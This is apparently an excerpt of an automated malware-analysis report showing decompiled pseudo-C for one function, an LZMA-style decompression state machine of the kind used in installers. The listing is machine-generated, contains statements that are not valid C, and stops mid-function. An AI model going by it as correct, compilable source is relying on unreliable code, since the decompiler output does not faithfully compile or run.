                                                                                    • Instruction ID: 868f2ec1f3ea74d7de1394d818727f69d5aca31e92bf34b5737afca42cfaef71
                                                                                    • Opcode Fuzzy Hash: d0b545a720d06a2780d8eb9310de1c164ea8e259f40aa19cdef3f662a7789f4d
                                                                                    • Instruction Fuzzy Hash: 6E913171D00229CBEF28CF98C8547ADBBB1FF44305F15812AD856BB281C7789A9ADF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040647D, Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E0040647D() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004069D4))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
